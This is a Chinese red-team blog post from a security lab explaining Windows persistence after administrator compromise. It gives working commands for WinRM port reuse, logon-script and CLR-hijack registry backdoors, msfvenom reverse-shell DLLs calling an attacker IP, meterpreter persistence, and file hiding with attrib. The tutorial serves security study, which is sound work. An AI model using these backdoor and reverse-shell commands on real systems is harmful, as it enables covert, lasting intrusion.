点击蓝字
关注我们
日期:2022-05-16
作者:L-Center
介绍:一些常见的Windows权限维持方式。
0x00 前言
前提条件: 拿到目标服务器administrator权限。
环境:Windows Server2012/windows 7。
0x01 维持方式
1.1 端口复用
使用Windows的远程管理管理服务WinRM,结合HTTP.sys驱动自带的端口复用功能。
建立连接后,服务端程序占用极少系统资源,被控端不会在系统性能上有任何察觉。
在Windows 2012WinRM服务默认启动并监听了5985端口。
在Winsows 7或2008来说需要手动开启。
winrm qucikconfig -q 启动winrm(winsows 7或2008)netstat -ano 查看端口信息
输入如下命令实现端口复用:
winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}winrm e winrm/config/listerner
再次查看端口信息5985端口仍然存在,在Winsows 7或2008版本中此端口为不开启状态。
使用winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
将winrm改为80端口。
再次查询便可查询不到5985端口信息。
客户端中将网络连接属性改为专用后cmd输入:
winrm quickconfig -qwinrm set winrm/config/Client @{TrustedHosts="*"}
设置完成后使用winrs命令,即可连接远程WinRM服务执行命令:
winrs -r:http://192.168.30.138 -u:administrator -p:Admin123 whoami获取结果后会直接退出。
使用cmd命令即可获取一个交互式的shell。
1.2 Logon scripts 后门
Logon Scripts优点是能够优先去执行,当用户登录时触发。
REG ADD "HKEY_CURRENT_USEREnvironment" /v UserInitMprLogonScript /t REG_SZ /d "C:UsersAdministratorDesktoptest2.exe"
重启或注销登录后得到shell。
1.3 进程注入
获得meterpreter的会话后,查看权限尝试获取哈希。
发现暂无权限,使用ps命令查看当前进程。
找到svchost.exe,是以system权限运行。
把后门注入到svchost.exe中,成功获取hash。
1.4 CLR 劫持
通过修改环境变量,使CLR作用于全局,从而劫持所有.net程序的启动。
CLR需要配置环境变量才可以完全劫持.net。
SETX COR_ENABLE_PROFILING 1 /M 设置环境变量为1SETX COR_PROFILER {GGUUGGUU-1234-1234-1234-AABBCCDDEEFF} /M
使用msf创建dll后门。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.130 LPORT=444 -f dll > test.dll 32位msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.30.130 LPORT=444 -f dll > test.dll 64位
创建完成后使用cmd修改注册表。
REG ADD "HKEY_CURRENT_USERSoftwareClassesCLSID{GGUUGGUU-1234-1234-1234-AABBCCDDEEFF}InProcServer32" /VE /T REG_SZ /D "C:WindowsSystem32test.dll" /FREG ADD "HKEY_CURRENT_USERSoftwareClassesCLSID{GGUUGGUU-1234-1234-1234-AABBCCDDEEFF}InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F
修改完成后在cmd输入powershell后在kali监听得到shell。
1.5 Persistence 后门
Persistence是使用安装自动方式的持久性后门程序,可以利用它创建注册和文件。
先通过攻击获取一个meterpreter shell后输入:
run persistence -A -S -U -i 5 -p 4444 -r 192.168.30.130-A 自启动payload-S 系统登录自动加载payload-U/X 用户登录时自动启动-i 回连的时间间隔
执行结束后,获得了一个Persistence后门。重启kali后重新监听后得到shell。
1.6 attrib 命令隐藏
attrib是Windows自带命令行工具,用来显示或更改文件属性,使用起来比较简单方便。
-R 只读文件属性。-A 存档文件属性。-S 系统文件属性。-H 隐藏文件属性。-I 无内容索引文件属性。/S 处理当前文件夹及其所有子文件夹中的匹配文件。/D 也处理文件夹。/L 处理符号链接和符号链接目标的属性。
输入
attrib +r +h +s将其隐藏。隐藏后只能通过attrib命令查看。
0x02 总结
要注意目标系统是32位还是64位,以此来生成对应的payload。
Windows操作系统的持久化后门还有很多,这里只是学习的一小部分。
免责声明:本文仅供安全研究与讨论之用,严禁用于非法用途,违者后果自负。
宸极实验室隶属山东九州信泰信息科技股份有限公司,致力于网络安全对抗技术研究,是山东省发改委认定的“网络安全对抗关键技术山东省工程实验室”。团队成员专注于 Web 安全、移动安全、红蓝对抗等领域,善于利用黑客视角发现和解决网络安全问题。
团队自成立以来,圆满完成了多次国家级、省部级重要网络安全保障和攻防演习活动,并积极参加各类网络安全竞赛,屡获殊荣。
对信息安全感兴趣的小伙伴欢迎加入宸极实验室,关注公众号,回复『招聘』,获取联系方式。
原文始发于微信公众号(宸极实验室):『红蓝对抗』Windows权限维持(二)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论